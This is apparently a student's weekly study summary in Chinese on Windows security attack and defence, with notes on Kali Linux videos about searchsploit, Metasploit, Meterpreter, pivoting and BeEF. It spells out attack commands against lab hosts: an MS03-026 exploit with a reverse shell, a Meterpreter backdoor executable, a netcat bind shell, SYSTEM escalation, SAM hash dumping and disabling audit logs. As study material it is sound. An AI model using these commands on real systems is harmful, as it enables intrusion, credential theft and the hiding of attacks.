20159313網絡攻擊與防範第七週學習總結

第七章Windows操做系統安全攻防總結

1.Windows操做系統的基本結構

分爲運行於處理器特權模式的操做系統內核，以及運行在處理器非特權模式的用戶空間代碼。採用宏內核模式來進行構架，這使得任意的內核模塊或設備驅動程序均可能破壞其餘內核模塊數據，這種宏內核機制也使得Windows操做系統容易遭受以驅動方式植入內核的Rootkit的危害，爲了不這類攻擊，最新的Windows7缺省要求因此請求安裝進入內核執行的設備驅動程序都須要通過數字簽名，這可以有效地提高內核的安全性。同時，因爲用戶態程序對操做系統內核特權代碼和數據沒有直接訪問的權利，所以Windows內核模塊對惡意的用戶態程序具有完善的防護能力。

2.Windows操做系統內核的基本模塊包括以下

Windows執行體、Windows內核體、設備驅動程序、硬件抽象層、Windows窗口與圖形界面接口內核實現代碼。

3.Windows操做系統在用戶態的代碼模塊則包括以下

系統支持進程、環境子系統服務進程、服務進程、用戶應用軟件、核心子系統DLL。

4.Windows操做系統內核中實現了以下的核心機制

Windows進程和線程管理機制、Windows內存管理機制（Windows的虛擬內存空間分爲系統核心內存區與用戶內存區間兩部分，系統核心內存用於映射內核、HAL、Win32k.sys等內核執行模塊，並存儲內核內存對象，對於內核中運行的特權代碼，則可經過DKOM技術來進行枚舉和操縱）、Windows文件管理機制（NTFS）、Windows註冊表管理機制（註冊表中的系統自啓動掛接點上註冊的應用軟件能夠隨系統引導而自動運行，所以也是不少惡意代碼及流氓軟件廣泛的攻擊目標）、Windows的網絡機制（從OSI網絡參考模型的物理層到應用層，各層上對應的Windows網絡組件模塊包括以下：①各層網卡硬件的設備驅動程序，處於OSI參考模型的物理層②NDIS庫及miniport驅動程序，位於OSI鏈路層③TDI，對應OSI網絡層與傳輸層④網絡APIDLL及TDI客戶端，對應OSI會話層與表示層⑤網絡應用程序與服務進程，對應OSI應用層）。

5.Windows安全體系結構

Windows操做系統基於引用監控器模型來實現基本的對象安全模型。系統中全部主體對客體的訪問都經過引用監控器做爲中介，由引用監控器根據安全訪問控制策略來進行受權訪問，全部訪問記錄也都由引用監控器生成審計日誌。Windows操做系統實現基礎的安全機制，其中最核心的是位於內核的SRM安全引用監控器，以及位於用戶態的LSASS安全服務，它們與Winlogon/Netlogon及Eventlog等服務一塊兒，實現了對主體用戶的身份認證機制，對全部資源對象的訪問控制機制，以及對訪問的安全審計機制。
Windows身份認證機制：Windows操做系統中以安全主體概念來包含全部進行系統資源訪問請求的實體對象，有用戶、用戶組和計算機三大類，對於每一個安全主體，以時間和空間上都全局惟一的SID安全標識符來進行標識。帳戶權限的根本做用就是限制這些帳戶內運行程序對系統資源對象的訪問。Windows系統中擁有一些內建帳戶，如擁有最高權限的本地Administrator帳戶，做爲自動運行系統進程環境的SYSTEM/LocalSystem帳戶，具備相對極少權限的Guest匿名訪問用戶，以及IUSR_Machinename IIS服務的匿名網絡訪問帳戶等。而這些帳戶在黑客眼中，本地Administrator和SYSTEM帳戶擁有最高的權限，是他們攻擊的終極目標。Windows系統的內建用戶組包括：本地最高權限用戶組Administrators、具備單一方面系統權限的Account/Backup/Server/Print Operators等操做組、用於容納服務帳戶的Network Service與Local Service用戶組，以及全部用戶帳戶所在的Users組等。 Windows用戶帳戶的口令字通過加密處理以後被保存於SAM或者活動目錄AD中，其中本地用戶帳戶口令信息通過不可逆的128位隨機密鑰Hash加密後存儲在SAM文件中，SAM存儲於%systemroot%\system32\config\sam文件系統路徑位置，並在註冊表的HKEY_LOCAL MACHINE\SAM存有副本。Windows域帳戶口令信息則保存在域控制器的活動目錄AD中，加密方式與單機平臺一致，存儲文件系統位置是域控制器的%systemroot%\ntds\ntds.dit路徑。Windows支持本地身份認證和網絡身份認證兩種方式，分別對在本地系統登陸和遠程網絡訪問的主主體進行合法性驗證。網絡身份認證過程由LSASS服務的Netlogon模塊主導完成。

6.Windows受權與訪問控制機制

Windows的受權與訪問控制機制是基於引用監控器模型，由內核中的SRM模塊與用戶態的LSASS服務共同來實施。在Windows服務器操做系統中，用戶能夠執行內建的whoami命令來查看當前用戶的訪問令牌信息。Windows對於系統中全部需保護的資源都抽象成對象，具體類型包括文件、目錄、註冊表鍵值、內核對象、同步對象、私有對象、管道、內存、通訊接口等，而對每一個對象會關聯一個SD安全描述符，對象安全描述符由以下主要屬性組成：Owner SID、Group SID、DACL自主訪問控制列表、SACL系統審計訪問控制列表。

7.Windows安全審計機制

系統審計策略在本地安全策略中由系統管理員定義，來肯定系統對那些事件進行記錄。

8.Windows的其餘安全機制

身份認證、受權與訪問控制以及安全審計是三個基本安全功能。保護Windows系統安全穩定運行最爲關鍵的三項安全措施——防火牆、補丁自動更新以及病毒防禦。除安全中心以外，Windows的安全特性還包括IPSec加密與驗證機制、EFS加密文件系統、Windows文件保護機制、捆綁的IE瀏覽器所提供的隱私保護與瀏覽安全保護機制等。

9.目前Windows遠程攻擊技術能夠分爲如下幾大類

遠程口令猜想與破解攻擊、攻擊Windows網絡服務、攻擊Windows客戶端及用戶。

10.Windows系統的安全漏洞生命週期

系統安全的本質核心在於安全漏洞、滲透攻擊及安全檢測防護機制之間的攻防博弈與競賽。全部在安全社區中被公開披露和確認的安全漏洞都將進入到業界知名的CVE、NVD、SecurityFocus、OSVDB等幾個通用漏洞信息庫中。國內的安全漏洞信息庫包括由中國信息安全評測中心維護的中國「國家漏洞庫CNNVD」、由國際計算機網絡應急技術處理協調中心維護的「國家信息安全漏洞共享平臺CNVD」、安全廠商綠盟科技公司維護的綠盟漏洞信息庫，以及Sebug網站維護的SSVDB等。針對一個特定的主機系統目標，典型的滲透攻擊過程包括漏洞掃描測試、查找針對發現漏洞的滲透代碼、實施滲透測試這幾個環節。在查找安全漏洞所對應的滲透攻擊代碼資源時，須要注意的是並不是每一個已知安全漏洞都可以在互聯網上獲取到滲透測試者所指望的滲透代碼。首先，並不是每一個已知安全漏洞都存在可用的滲透代碼，安全漏洞所在的軟件的流行度、漏洞的利用約束條件以及漏洞的危害後果類型等都影響了爲該安全漏洞開發滲透攻擊代碼的價值，另外有些安全漏洞在利用以前就已經被軟件廠商所修補，那麼也可能致使沒人去開發相應的滲透代碼，另一些安全漏洞的利用難度很大，也存在着特定時間裏沒人有技術能力寫出滲透代碼的狀況，其次，並不是全部的滲透代碼都是公開的，最後，獲取到的滲透代碼並不是是對全部目標系統環境都適用的。能否達成測試者的預期目標則取決於滲透代碼和攻擊目標的軟件環境是否匹配。

11.使用Metasploit軟件實施滲透測試

Metasploit軟件採用開發框架和模塊組建的可擴展模型，以Ruby語言編寫的Metasploit Framework（MSF）庫做爲整個軟件的基礎核心，爲滲透測試組建的開發與測試提供平臺；模塊組建是真正實施滲透攻擊的代碼，包括利用安全漏洞的Exploits模塊，進行掃描、查點等其餘輔助任務的Auxiliary模塊，在目標系統上植入和運行的Shellcode攻擊負載Payloads模塊，對攻擊負載進行編碼以躲避檢測的Encoders模塊，以及對攻擊負載進行填充的Nops模塊；Metasploit提供多種用戶接口，包括Console交互終端、命令行程序運行、Web交互界面以及GUI圖形化界面；Metasploit還提供了API接口及插件支持，來支持第三方在MSF基礎上開發擴展模塊，好比自動化的滲透測試例程等等。

12.使Metasploit Console終端實施滲透測試，只需運行以下命令

①use exploit/windows/dcerpc/ms03_026_dcom,選擇針對MS03_026漏洞的滲透攻擊模塊。②set PAYLOAD generic/shell reverse_tcp，選擇該滲透攻擊模塊適用的攻擊負載模塊。③set LHOST 192.168.200.2；set RHOST 192.168.200.124,配置該滲透攻擊模塊和攻擊負載模塊所必須配置的參數。④exploit，實施滲透攻擊過程。⑤在遠程控制會話中與目標主機進行交互，可能須要執行「sessions -I」列出當前已創建的遠程控制會話，並執行「sessions –i數字」在指定的供給控制會話中與遠程目標主機進行交互。

13.遠程口令字猜想

Windows經過基於服務器消息塊協議承載的文件與打印共享服務來爲網絡用戶提供訪問文件系統和打印機的支持，而SMB協議也成爲了攻擊者實施Windows遠程口令字猜想的傳統攻擊渠道。其餘常常遭受遠程口令字猜想攻擊的Windows網絡服務還包括WMI服務、TS遠程桌面終端服務、MS SQL數據庫服務、SharePoint等使用Windows身份認證Web應用服務。SMB協議一般運行於TCP445端口與TCP139端口。在SMB服務決定授予網絡用戶對所請求的共享文件或打印機的訪問權以前，它會先對用戶身份進行驗證。攻擊者一般使用SMB默認開放的隱藏共享卷做爲攻擊點，而後攻擊者須要目標系統的用戶名單做爲猜想對象，而後根據提示輸入所猜想的Administrator帳戶的口令，就能夠發動攻擊了。固然遠程口令字猜想成功的前提條件是大量系統中設置了具有弱口令字的用戶賬號。目前可以自動執行Windows遠程口令字猜想的工具比較流行與經常使用的工具包括Legion、enum、SMBGrind、NTScan，以及國內較流行的XScan、小榕軟件之流光和NTScan漢化版等，這些遠程口令猜想工具每每須要配合一個包含「高几率口令」的字典文件來實施攻擊，對長度較短的口令也可以進行窮舉暴力破解。對於運行於TCP1433和UDP1434端口的MS SQL Server，可使用sqlbf、Auto-SQL等工具進行口令猜想破解。

14.遠程口令字交換通訊竊聽與破解

第二種實施遠程口令字攻擊的經典技術是竊聽網絡上的口令字交換通訊實施破解。應對遠程口令猜想與破解這種古老但仍然流行的攻擊方式，最根本的防護措施仍然是經過安全培訓與教育來讓網絡中每一個用戶都可以設置較高安全強度的口令。此外，從技術方面，網絡系統管理員還能夠實施以下措施，從而下降因爲網絡中用戶設置過於簡單的口令所帶來的安全風險：①儘可能關閉沒必要要開放的易受遠程口令猜想攻擊網絡服務，包括TCP 139/445端口的SMB服務、TCP135端口的WMI服務、TCP3389端口的TS終端服務以及TCP1433端口的MS SQL Server服務等。②配置主機防火牆來限制對上述端口的服務。③利用網絡防火牆來限制到這些服務的訪問。④應對遠程口令字交換通訊竊聽與破解攻擊最基本的途徑是禁用過期並且存在本質上安全缺陷的LanMan與NTLM。⑤對於安全級別較高的Windows系統服務器等主機，管理員能夠制定和實施強口令字策略，此外能夠設置帳戶鎖定閾值，最後還能夠在系統上激活賬戶登陸失敗事件審計功能。

15.Windows網絡服務遠程滲透攻擊

Windows操做系統默認開放135（TCP）、137（UDP）、138（UDP）、139（TCP）與445（TCP）端口，對應的網絡服務爲MSRPC遠程調用服務、NetBIOS網絡基本輸入/輸出系統服務和SMB文件與打印共享服務。

16.針對NetBIOS網絡服務的著名漏洞及攻擊

NetBIOS網絡基本輸入輸出系統提供了Windows局域網聯網的基本支持，包括在UDP137端口上監聽的NetBIOS名字服務、UDP138端口上的NetBIOS數據報服務以及TCP139端口上的NetBIOS會話服務。

17.針對SMB網絡服務的著名漏洞及攻擊

服務消息塊SMB是Windows操做系統中最爲複雜，也最容易遭受遠程滲透攻擊的網絡服務。SMB空會話是Windows網絡中影響範圍最廣和時間最長的安全弱點之一。

18.針對MSRPC網絡服務的著名漏洞及攻擊

MSRPC網絡服務是微軟Windows操做系統對DCE-RPC標準遠程過程調用機制的實現。遠程過程調用機制是現代操做系統最基本的支撐機制之一，容許一個應用程序可以無縫地經過網絡調用遠程主機上網絡進程中的過程，在MSRPC實現中，能夠採用以下的網絡傳輸協議：①ncacn_ip_tcp：TCP/IP傳輸協議，使用TCP135端口②ncadg_ip_udp:UDP/IP傳輸協議，使用UDP135端口③ncacn_np:SMB命名管道傳輸協議，使用SMB的TCP139或445端口④ncalrpc:本地網絡RPC傳輸⑤ncacn_http:HTTP傳輸協議，基於IIS服務，缺省配置在TCP593端口。支持遠程過程調用的服務進程啓動時，須要註冊本身的服務訪問點，接口標識符以及服務版本號，一個特殊的RPC服務——Portmapper將維護RPC服務數據庫，爲網絡應用程序調用指定的RPC服務提供訪問點、接口與版本的查詢功能支持。

19.針對Windows系統上微軟網絡服務的遠程滲透攻擊

IIS Internet服務集成了HTTP、FTP、SMTP、POP、NNTP等網絡服務，並支持CGI、ASP、ISAPI等動態編程語言與接口，是微軟服務器軟件提供網站、電子郵件收發和文件共享服務的主要解決方案。MS SQL Server監聽TCP1433與UDP1434端口，支持使用Windows用戶帳號進行身份認證模式。MS SQL Server自建用戶身份認證模式，SQL Server數據庫服務的登錄帳號加密存儲與master數據庫的syslogins表中，並對用戶進行角色管理和受權訪問控制，同時提供訪問日誌功能，總體安全水平可以達到C2級別。

20.網絡服務遠程滲透攻擊防範措施

針對Windows系統上的各類網絡服務遠程滲透攻擊，最基本的防範措施就是儘可能避免與消除這些滲透攻擊所依賴的服務軟件安全漏洞，具體包括以下：①從軟件設計開發根源上儘量減小安全漏洞的出現②做爲系統的使用者和管理員，應儘量快地更新與應用軟件安全補丁③在安全漏洞從被意外公佈和利用到補丁發佈的這段「零日」漏洞時間，管理員對安全敏感的服務器應該測試和實施科永的攻擊緩解配置④利用服務軟件廠商及社區中提供的安全覈對清單來對服務進行安全配置⑤經過漏洞掃描軟件來標識網絡中存在的以及安全漏洞並及時修補。

21.Windows本地特權提高

從受限用戶權限嘗試得到特權帳戶的攻擊技術也被稱爲特權提高，業內簡稱爲「提權」。Windows系統上進行特權提高的共計途徑主要是經過DLL注入和破解本地程序安全漏洞。從技術上來講，得到了Administrator權限並不意味着得到了Windows系統的最高權限，Local System帳戶比Administrator帳戶的權限更高，好比Administrator不能在系統運行時刻讀取SAM位置註冊表鍵值，而Local System卻能夠。有了Administrator權限，得到Local System權限就很簡單了，一種方法是利用Windows的計劃任務服務，執行「atXX:XX/INTERACTIVE cmd.exe」打開一個命令Shell，該Shell的權限即爲Local System；另外一種方法是利用sysinternals的免費工具psexec，它甚至容許以遠程方式得到和使用Local System權限。針對本地提權攻擊，與網絡服務的遠程滲透攻擊相似，最根本的防範措施就是及時給你的系統打好各類補丁。

22.Windows系統口令字密文提取技術

在本地獲取口令字密文的主要包括以下三種途徑：①從另外一種操做系統啓動後拷貝文件系統中的口令密文文件②利用硬盤修復工具包中的rdisk工具，執行「rdisk/s-」命令建立SAM備份文件副本③使用pwdumpX系列工具直接從SAM文件或活動目錄中提取口令字密文。

23.LSA Aercrets一般位於HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets子鍵下，LSA Secrets收錄以下信息

①某些服務帳戶的明文口令字②本季系統最近10位用戶的口令字密文③FTP、Web用戶的明文口令字④RAS遠程訪問服務撥號帳戶的名字和口令字⑤用來訪問域控制器的計算機帳戶和口令字密文。

24.用戶敏感數據竊取

對於用戶在系統中的文件，攻擊者能夠執行find、findstr、grep等命令行工具來實施查找，此外，攻擊者也可能使用鍵擊記錄器來對用戶鍵盤輸入進行監聽，並指望從中搜索用戶登錄某些應用軟件、網遊、金融網站的口令密碼。

25.本地敏感信息竊取防範措施

針對LSA Secrets和其餘位置口令字的竊取與破解，目前這種攻擊廣泛須要攻擊者已經具備Administrator的權限，在這種狀況下，系統很難防止攻擊者獲取到這些信息，所以只能經過使用更安全的加密算法保護明文口令字，以及經過安全配置策略避免緩存關鍵服務器的銘感登錄口令信息，來儘可能下降這種攻擊形成的安全風險。

26.Windows消蹤滅跡

①關閉審計功能（Windows Resource Kit工具包裏的auditpol程序可讓他們輕易地關閉審計功能）②清理事件日誌（使用Event Viewer事件查看器來打開、讀取和清除這臺主機上的事件日誌）

27.Windows遠程控制與後門程序

攻擊者每每會在受控的系統中自主植入第三方的遠程控制與後門程序，主要分爲命令行遠程控制工具、圖形化遠程控制工具這兩大類。Netcat工具是攻擊者們最經常使用的命令行遠程控制工具麼能夠經過「nc-L-d-e cmd.exe-p 80」命令啓動後門服務，監聽所配置的TCP 80端口，並綁定cmd.exe這個Shell程序，當攻擊者使用Netcat做爲客戶端鏈接目標主機的80端口時，就能夠經過網絡直接訪問到目標主機上的cmd.exe來執行任意的操做。Meterpreter的設計目標包括以下：①隱蔽性②設計功能強大③靈活可擴展。

28.針對後門程序的防範措施

針對遠程控制後門程序，在一臺計算機已經懷疑遭受攻擊的Windows系統上，防護者能夠採用一些後門檢測軟件來嘗試發現攻擊者隱藏的後門程序，經常使用的檢測軟件包括反病毒廠商所提供的殺毒軟件，以及一些專業的後門及Rootkit檢測軟件。

Kali視頻第26-30集總結

1.Kali視頻第26集漏洞利用之檢索與利用總結

Searchsploit
一、工具簡介
這個項目是由Offensive Security發起的、基於exploit database官方漏洞數據庫源的漏洞搜索工具，能夠直接在終端搜索漏洞相關信息，如漏洞簡介和漏洞驗證/利用腳本。
二、使用方法
在kali終端直接輸入「searchsploit -h」能夠查看其相關參數用法：
light@kali:~# searchsploit -h
Usage : searchsploit [OPTIONS] term1 [term2] ... [termN]
Example: searchsploit oracle windows local
OPTIONS
-c - Perform case-sensitive searches; by default,
searches will try to be greedy
-v - By setting verbose output, description lines
are allowed to overflow their columns
-h, --help - Show help screen

NOTES:

• Use any number of search terms you would like (minimum: 1)

• Search terms are not case sensitive, and order is irrelevant
  參數解釋：
  •-c : 搜索是大小寫敏感
  •-v : 詳細輸出
  
  三、使用示範
  好比咱們要搜索windows上iis服務的遠程漏洞，可使用如下命令：
  light@kali:~# searchsploit windows iis remote
  Description Path
  MS Windows IIS 5.0 - 5.1 - Remote Denial of | /windows/dos/35.c
  MS Windows Media Services (nsiislog.dll) Rem | /windows/remote/56.c
  MS Windows IIS SSL Remote Denial of Service | /windows/dos/176.c
  MS IIS 4.0/5.0 and PWS Extended Unicode Dire | /windows/remote/189.c
  MS IIS 4.0/5.0 and PWS Extended Unicode Dire | /windows/remote/190.c
  MS IIS 4.0/5.0 and PWS Extended Unicode Dire | /windows/remote/191.pl
  MS IIS 4.0/5.0 and PWS Extended Unicode Dire | /windows/remote/192.pl
  MS Windows IIS 5.0 SSL Remote buffer overflo | /windows/remote/275.c
  MS Windows IIS 5.0 (500-100.asp) Server Name | /windows/remote/1178.c
  MS Windows IIS SA WebAgent 5.2/5.3 Redirect | /windows/remote/1260.pm
  Microsoft IIS 6.0 (/AUX/.aspx) Remote Denial | /windows/dos/3965.pl
  Microsoft IIS <= 5.1 Hit Highlighting Authen | /windows/remote/4016.sh
  Oracle WebLogic IIS connector JSESSIONID Rem | /windows/remote/8336.pl
  Microsoft IIS 6.0 WebDAV Remote Authenticati | /windows/remote/8704.txt
  Microsoft IIS 6.0 WebDAV Remote Authenticati | /windows/remote/8754.patch
  Microsoft IIS 6.0 WebDAV Remote Authenticati | /windows/remote/8765.php
  Microsoft IIS 6.0 WebDAV Remote Authenticati | /windows/remote/8806.pl
  Microsoft IIS 5.0/6.0 FTP Server Remote Stac | /windows/remote/9541.pl
  Microsoft IIS 5.0 FTP Server Remote Stack Ov | /windows/remote/9559.pl
  Microsoft IIS ASP Multiple Extensions Securi | /windows/remote/10791.py
  Microsoft Internet Information Services (IIS | /windows/remote/14179.txt
  Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS | /windows/dos/15803.py
  Microsoft IIS ISAPI w3who.dll Query String O | /windows/remote/16354.rb
  Microsoft IIS ISAPI nsiislog.dll ISAPI POST | /windows/remote/16355.rb

  2.Kali視頻第27集漏洞利用之Metasploit基礎總結

  Metasploitable在滲透測試中常常被用到，實際上這套軟件包括了不少工具，這些工具組成了一個完整的攻擊框架。
  1、啓動服務
  在Kali中使用metaaploie，須要先開啓PostgreSQL數據庫服務和metasploit服務，而後就能夠完整的利用msf數據查詢exploit和記錄。
  service postgresql start service metasploit start
  若是不想每次開機都手工啓動服務，能夠配置隨系統啓動。
  update-rc.d postgresql enable
  update-rc.d metasploit enable
  

2、路徑介紹
Kali中msf的路徑爲/usr/metasploit-framework
Auxiliary：輔助模塊，
encoders：供msfencode編碼工具使用，具體可使用
msfencode –l
exploits：攻擊模塊 每一個介紹msf的文章都會提到那個ms08_067_netapi，它就在這個目錄下。
payloads：其中列出的是攻擊載荷，也就是攻擊成功後執行的代碼。好比咱們常設置的windows/meterpreter/reverse_tcp就在這個文件夾下。
post：後滲透階段塊，在得到meterpreter的shell以後可使用攻擊代碼。好比經常使用的hashdump、arp_scanner就在這裏。

3、基本命令
msfpayload：用來生成payload或者shellcode

搜索的時候能夠用msfpayload -l |grep "windows"這樣的命令查詢。-o 選項能夠列出payload所需的參數。
msfencode：
msf中的編碼器，早期爲了編碼繞過AV，現經常使用msfpayload與它編碼避免exploit中的壞字符串。
msfconsole：開啓metasploit的concle
4、測試示例：發現漏洞，搜索exploit

前期掃描得知，目標21端口vsftpd服務版本爲2.3.4，使用msfconsole打開msf的命令行版。
找到匹配項
選擇相應功能
設置遠程ip地址，端口號用21
攻擊成功

3.Kali視頻第28集漏洞利用之Meterpreter介紹總結

Meterpreter是Metasploit框架中的一個擴展模塊，做爲溢出成功後的攻擊載荷使用，攻擊載荷在溢出攻擊成功之後給咱們返回一個控制通道。使用它做爲攻擊載荷可以得到目標系統的一個meterpretershell的連接。
Meterpreter做爲後滲透模塊有多種類型，而且命令由核心命令和擴展庫組成，極大地豐富了攻擊方式。其有不少有用的功能。
經常使用命令：
background：將當前會話放置後臺
load/use：加載模塊
Interact：切換一個信道
migrate：遷移進程
run：執行一個已有模塊，輸入run後按兩下teb，會列出全部的已有腳本。
Resource：執行一個已有的rc腳本經常使用的Meterpreter類型爲：payload/windows/meterpreter/reverse_tcp
針對windows操做系統，反向鏈接shell，只用起來比較穩定。
1、生成Meterpreter後門
命令：msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.75.132 LPORT=2333 R | msfencode -t exe -c 5 > /root/door1.exe

在指定目錄，生成exe文件

生成一個後門就要打開一個監聽，接收返回的鏈接，查看須要的參數。須要兩個參數LHOST，LPORT。
將生成的文件模仿入侵的過程移動到靶機裏。
set LPORT 2333
set LHOST 192.168.75.132
exploit
background返回到msf裏
screenshot桌面截圖

4.kali視頻第29集Metasploit後滲透測試總結

怎樣設置跳板機？
在跳板機獲取必定權限後，須要積極地向內網主機權限發展，獲取指定的目標信息，探查系統的漏洞，藉助Msf已經獲得的Meterpreter後門，可使後續操做更容易。
一、查看當前網卡、網段信息
先控制一臺跳板機，查看相關網卡網段信息
二、添加路由表 run autoroute -s 10.0.0.1
三、開Socks代理 經過使用 auxiliaryver/socks4a模塊，建立一個Socks代理，能夠做爲瀏覽器，Sqlmp，Namp等使用。
四、經過Background和sessions -i能夠自由切換進入Session
五、輸入run能夠看到Meterpreter上能夠作的不少命令
六、獲取內網信息run arp_scanner -r 10.0.0.1/24
七、也可上傳文件，作端口轉發後續測試
八、應用程序/權限維持/Tunnel工具集
九、端口轉發 upload lcx.exe c:\

5.Kali視頻第30集漏洞利用之BeeF總結

對XSS漏洞須要強大框架的支持，如網上的XSS平臺。在Kali下，BeeF是一個不遜色於XSS平臺的工具。Beef是瀏覽器攻擊框架的簡稱，是一款專一於瀏覽器端的滲透測試工具。官網 http://beefproject.com/
一、命令行下啓動Beef beef-xss 此時瀏覽器自動訪問此頁面：http://127.0.0.1:3000/ui/authentication 使用默認用戶名beef與默認密碼beef登陸：
初始用戶名和密碼爲：beef和beef 左側爲目標的瀏覽器
二、假設被測試主機因爲XSS漏洞請求到 http://192.168.11.152:3000/demos/basic.html
左側online browsers出現新的選項，其Current Browser中包括瀏覽器名稱、版本、操做系統版本等。
三、HOOK持續的時間爲關閉測試頁面爲止，在此期間，至關於被控制了，能夠發送攻擊命令，在Commands模塊，咱們能夠完成不少任務：
其中，四種顏色分別表示：
該攻擊模塊可用，但隱蔽性強
該攻擊模塊可用，但隱蔽性差
該用戶模塊是否可用還有待驗證
該攻擊模塊不可用
選取MISC下Raw JavaScript模塊做爲測試用例
執行，查看返回結果，成功則顯示
四、代理Proxy功能
選中目標主機，點右鍵，在菜單中選中Use as Proxy；而後在Rider選項卡中的Forge Request編輯併發送想要發送的內容。

第七週學習進度

完成了課本第七章的學習，完成了kali視頻第26到30集的學習。